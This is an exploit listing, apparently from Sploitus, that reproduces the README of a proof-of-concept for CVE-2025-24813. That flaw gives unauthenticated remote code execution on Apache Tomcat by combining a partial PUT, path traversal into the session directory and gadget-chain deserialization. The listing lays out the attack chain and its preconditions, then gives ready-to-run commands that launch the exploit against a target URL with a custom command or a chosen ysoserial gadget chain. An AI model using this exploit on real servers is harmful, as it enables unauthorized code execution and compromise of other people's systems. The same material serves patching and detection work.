Share
## https://sploitus.com/exploit?id=DC895D2C-C97A-501C-852B-ED9751BD59EE
CVE-2025-24813
  Apache Tomcat - Remote Code Execution via Session Deserialization
  Unauthenticated partial PUT + path traversal + gadget-driven deserialization


### Description
Apache Tomcat instances with the default servlet PUT enabled (`readonly=false`) allow writing files via partial HTTP PUT requests. By crafting a path that traverses out of the upload directory into the session store (`../sessions/`), an attacker can plant a serialized Java object as a `.session` file. The next request that references this session id triggers deserialization, executing the embedded gadget chain.

**Requirements:**
- Default servlet `readonly=false` (non-default configuration)
- A gadget chain (e.g. CommonsCollections) in the Tomcat classpath
- `PUT` and path traversal are not filtered by a reverse proxy or WAF

### Usage
```
git clone https://github.com/yuzuki-ayanami/CVE-2025-24813
cd CVE-2025-24813
pip install -r requirements.txt
```

Basic check + exploit (auto-compiles Java payload when ysoserial is absent):
```
python cve-2025-24813.py http://target:8080
```

Custom command:
```
python cve-2025-24813.py http://target:8080 --command 'whoami'
```

ysoserial gadget chain (stronger reliability):
```
python cve-2025-24813.py https://target --ysoserial ysoserial.jar --gadget CommonsCollections6
```

### Requirements
- Python 3.8+
- `requests` (see `requirements.txt`)
- Java JDK (for auto-compilation fallback when ysoserial is not used)
- `ysoserial.jar` (optional, provides more reliable gadget chains)

### Affected Versions
Apache Tomcat versions with the partial PUT feature exposed on the default servlet. The precise version range depends on gadget availability - the vulnerability is a configuration + classpath combo rather than a version-bounded software bug.

### Credits
- Yuzuki Ayanami - Improved PoC
- [absholi7ly](https://github.com/absholi7ly/POC-CVE-2025-24813) - Original exploit